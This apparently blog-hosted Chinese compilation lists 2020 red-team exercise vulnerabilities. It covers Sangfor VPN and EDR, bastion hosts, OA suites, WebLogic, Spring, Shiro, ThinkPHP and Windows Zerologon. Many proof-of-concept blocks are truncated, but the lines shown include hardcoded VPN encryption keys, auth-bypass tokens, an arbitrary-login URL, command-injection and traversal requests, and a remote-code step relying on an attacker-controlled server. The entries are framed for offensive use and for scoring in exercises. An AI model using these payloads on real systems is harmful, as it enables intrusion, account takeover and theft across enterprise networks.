2020HW漏洞合集
持续整理中…
一、安全设备
1、深信服 SSL VPN Nday - Pre Auth 修改绑定手机
描述:
某VPN加密算法使用了默认的key,攻击者构利用key构造重置密码数据包从而修改任意用户的密码
M7.6.6R1版本key为20181118
M7.6.1key为20100720
利用条件:需要登录账号
1 | #计算RC4_STR_LEN脚本 |
1 | POST https://<PATH>/por/changepwd.csp HTTP/1.1 |
参考:https://www.yuque.com/docs/share/ad8192ca-39ec-4950-86e9-01dfa989bf6f?#(密码:gf34)
2、深信服 SSL VPN Nday - Pre Auth 任意密码重置
描述:修改手机号接口未正确鉴权导致越权覆盖任意用户的手机号码
利用条件:需要登录账号
1 | POST https://<PATH>/por/changetelnum.csp?apiversion=1 |
参考:https://www.yuque.com/docs/share/ad8192ca-39ec-4950-86e9-01dfa989bf6f?#(密码:gf34)
3、深信服SSL VPN 远程代码执行漏洞 CNVD-2020-48679
1 | https://www.onebug.org/websafe/98922.html |
4、深信服 SSL VPN 任意用户添加漏洞
5、深信服 EDR3.2.21远程代码执行
1 | POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9【访问nginx规则路径,绕过第一个检查;{"md5":true}的base64编码,绕过第二个检查】 HTTP/1.1 |
参考:https://www.cnblogs.com/0day-li/p/13650452.html
6、深信服 EDR 任意用户登录漏洞 CNVD-2020-46552
影响版本:EDR <= v3.2.19
1 | payload:https://ip:xx/ui/login.php?user=任意用户名 |
7、深信服 EDR 远程命令执行漏洞
影响版本:深信服EDR 3.2.16;深信服EDR 3.2.17;深信服EDR 3.2.19
1 | POC: |
8、绿盟UTS综合威胁探针管理员任意登录/密码泄露
影响版本:UTS < V2.0R00F02SP03
1 | POC步骤: |
参考:https://www.cnblogs.com/0day-li/p/13650550.html
9、天融信TOPApp-LB负载均衡SQL注入漏洞
1 | POST /acc/clsf/report/datasource.php HTTP/1.1 |
10、天融信数据防泄漏系统未授权修改管理员密码
描述:
无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd。接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。
1 | POST /?module=auth_user&action=mod_edit_pwd http/1.1 |
参考:https://www.secpulse.com/archives/140809.html
其它漏洞:https://blog.csdn.net/Adminxe/article/details/108744908
11、网御星云VPN老版本漏洞
12、齐治堡垒机前台远程命令执行漏洞 CVND-2019-20835
漏洞利用:fofa_dork: ‘body=”齐治科技”‘,一般通过VPN访问,互联网不能直接访问
利用条件:无需登录:
1 | 假设10.20.10.11为黑客可控的服务器,listener/cluster_manage.php文件的内容为“<?php echo ‘OK’;>” |
参考:https://www.secpulse.com/archives/140809.html
齐治堡垒机命令执行CVE-2019-17294
1 | POST /audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min=40&server_cond=&service=`id`&identity_cond=&query_type=all&format=json&browse=true HTTP/1.1 |
13、Aruba Clearpass远程代码执行漏洞 CVE-2020-7115
1 | https://portswigger.net/daily-swig/critical-aruba-clearpass-rce-vulnerability-exposes-underlying-systems |
14、PAN-OS远程代码执行漏洞 CVE-2020-2040
15、联软准入文件上传漏洞
1 | POST /uai/download/uploadfileToPath.htm HTTP/1.1 |
参考:https://blog.csdn.net/m0_48520508/article/details/108790281
二、OA
1、通达OA11.6未授权远程代码执行漏洞
描述:该漏洞是由于通过删除通达OA身份认证文件达到绕过登录限制, 结合任意文件上传达到RCE的效果。
影响版本:通达OA<v11.5&v11.6版本
1 | import requests |
参考:https://www.cnblogs.com/wangfuguiblog/p/13712433.html
2、通达OA11.4 越权登录漏洞
备注:4.17老漏洞
1 | def poc(url): |
3、通达OA11.5 多处SQL注入漏洞
1 | POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1 |
1 | GET /general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=×tamp=1598069133&total= HTTP/1.1 |
1 | GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=×tamp=1598069103&total= HTTP/1.1 |
1 | GET /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 HTTP/1.1 |
1 | POST /general/file_folder/swfupload_new.php HTTP/1.1 |
1 | 会过滤掉:空格、制表符、换行符、回车符、垂直制表符等。只能报错,或尝试 and 等语句判断还是没有问题的。 |
1 | POST /general/appbuilder/web/meeting/meetingmanagement/meetingreceipt HTTP/1.1 |
参考:零组;https://www.cnblogs.com/yuzly/p/13608532.html
4、通达OA文件包含漏洞
备注:3月份老漏洞
1 | import requests |
5、用友GRP-u8 XXE&SQL注入导致命令执行
描述: 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。
利用条件:无需登录
1 | POST /Proxy HTTP/1.1 |
参考:https://www.cnblogs.com/yuzly/p/13675224.html
6、用友NC6.5反序列化漏洞
1 | import nc.bs.framework.common.NCLocator; |
1 | import javax.naming.Context; |
利用 nc 自带的类进行远程部署利用
1 | import nc.bs.framework.common.ComponentMetaVO; |
参考:https://blog.sari3l.com/posts/608d18f0/ https://xz.aliyun.com/t/8242?page=5
7、致远A8任意文件写入文件上传漏洞
备注:去年HW老漏洞
1 | import requests |
8、致远A8反序列化漏洞
9、泛微e-cology某版本存在RCE漏洞
备注:去年HW老漏洞
1 | import requests |
10、泛微云桥任意文件读取
1 | import requests |
参考:xray
三、中间件/容器
1、Weblogic命令执行漏洞 CVE-2020-14645
参考:https://my.oschina.net/u/4582816/blog/4436485
2、Weblogic反序列化漏洞 CVE-2020-2551
参考:https://xz.aliyun.com/t/7725
3、Weblogic反序列化漏洞 CVE-2020-2555
参考:https://www.secpulse.com/archives/140207.html
4、WebSphere远程代码执行漏洞 CVE-2020-4450
5、WebSphere远程代码执行漏洞 CVE-2020-4362
参考:https://xz.aliyun.com/t/8248?page=5
6、WebSphere 存在XXE外部实体注入漏洞 CVE-2020-4643
1 | xml如下: |
参考:https://paper.seebug.org/1342/
7、Apache Tomcat文件包含漏洞 CVE-2020-1938
备注:2月漏洞
1 | #!/usr/bin/env python |
8、Apache Tomcat session持久化远程代码执行漏洞 CVE-2020-9484
参考:https://blog.csdn.net/xuandao_ahfengren/article/details/106937171 https://xz.aliyun.com/t/7803#toc-1
9、Nginx使用LemonLDAP::NG权限绕过 CVE-2020-24660
四、框架
JAVA:
1、Spring MVC框架RFD攻击漏洞(反射文件下载)CVE-2020-5398
1 | GET /?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Awhoami%27%20--dump-header%20- HTTP/1.1 |
参考:https://www.cnblogs.com/Sylon/p/12700849.html
2、Spring Framework反射型文件下载漏洞 CVE-2020-5421
参考:https://xz.aliyun.com/t/8341?page=5
3、Spring-Cloud-Config-Server目录遍历 CVE-2020-5410
1 | http://ip:8889/flag.txt%23/222/..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29tmp%28_%29 |
参考:https://xz.aliyun.com/t/7877
4、Spring Cloud Netflix Hystrix Dashboard SSRF
1 | /proxy.stream?origin=http://www.baidu.com |
5、Apache Cocoon XML注入 cve-2020-11991
1 | <!--?xml version="1.0" ?--> |
参考:https://www.cnblogs.com/Yang34/p/13665674.html
6、Apache Shiro 权限绕过漏洞 CVE-2020-13933
7、Apache Shiro身份验证绕过漏洞 CVE-2020-11989
1 | http://localhost:8080/;/admin/index |
参考:https://xz.aliyun.com/t/7964
8、Apache Dubbo远程代码执行漏洞 CVE-2020-11995
9、Apache Dubbo反序列化漏洞 CVE-2020-1948
10、Apache Dubbo反序列化漏洞 CVE-2019-1756
11、Struts2远程代码执行漏洞 CVE-2019-0230
1 | poc1: |
1 | poc2: |
参考:https://paper.seebug.org/1331/
12、Jackson 多个反序列化安全漏洞 CVE-2020-24616
13、Fastjson <= 1.2.68 远程命令执行漏洞
PHP
1、ThinkPHP 3.x注入漏洞
2、ThinkPHP 6 任意文件操作漏洞
备注:2020年1月老漏洞
1 | POST /tp6/public/index.php/index/test1 HTTP/1.1 |
3、Yii 2框架反序列化远程命令执漏洞 CVE-2020-15148
1 |
|
参考:https://mp.weixin.qq.com/s/3a3whSUhxMZz2g3btxdytw https://xz.aliyun.com/t/8307
4、Fastadmin文件上传漏洞,危害级别:高危
1 | 通过前文可知,这个漏洞的利用点在_empty()函数,需要注意的是,在官方文档中通常_empty()方法是用来判断一个方法是否存在,如果不存在,则进入该函数。而这里是开发者自定义的方法,因此直接传入_empty方法,调用name参数即可。 |
参考:https://www.cnpanda.net/codeaudit/777.html
5、thinkadmin 目录遍历/任意文件读取 CVE-2020-25540
参考:https://github.com/zoujingli/ThinkAdmin/issues/244
五、操作系统
1、Windows NetLogon特权提升漏洞 CVE-2020-1472
利用条件:
未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞。成功利用此漏洞的攻击者可获得域管理员访问权。
可以下载利用脚本1-置空密码和利用脚本2-恢复密码来Getshell
1 | #!/usr/bin/env python3 |
参考链接:https://mp.weixin.qq.com/s/MagXtN1hfNPTQdcIMDOZEA
https://github.com/blackarrowsec/redteam-research
https://www.cnblogs.com/forforever/p/13682344.html
https://mp.weixin.qq.com/s/f1f1nGSMdEXJL3lY7FCMMw
https://www.cnblogs.com/forforever/p/13682344.html
2、永恒之蓝 MS17-17010
内网刷分的利器
六、数据库
1、redis
Redis未授权访问漏洞利用总结
Redis 4.x RCE
redis利用姿势收集
Redis历史漏洞合集
2、hadoop
3、mysql
Mysql提权(CVE-2016-6663、CVE-2016-6664组合实践)
Mysql数据库渗透及漏洞利用总结
Mysql 注入专辑
PhpMyadmin的几种getshell方法
高版本MySQL之UDF提权
Mysql历史漏洞合集
4、Mssql
Mssql利用姿势整理(史上最全)
Mssql数据库命令执行总
利用mssql模拟登录提权
高级的MSSQL注入技巧
MSSQL使用CLR程序集来执行命令
5、Nosql
七、邮件
参考:https://mp.weixin.qq.com/s/wiZJUQ6Un9UuE98YFBYWig
1、Exchange
CVE-2020-17083 Microsoft Exchange Server 远程执行代码漏洞
Microsoft Exchange远程代码执行漏洞(CVE-2020-16875)
CVE-2020-0688_微软EXCHANGE服务的远程代码执行漏洞
2、coremail
八、项目管理
1、禅道
CNVD-C-2020-121325 禅道开源版文件上传漏洞
2、Jira
Jira服务工作台路径遍历导致的敏感信息泄露漏洞(CVE-2019-14994)
Atlassian JIRA服务器模板注入漏洞(CVE-2019-11581)
更新说明:
[2021.1.21更新数据库、邮件、项目管理部分] 参考:https://mp.weixin.qq.com/s/wiZJUQ6Un9UuE98YFBYWig
[2020.10.27更新操作系统部分]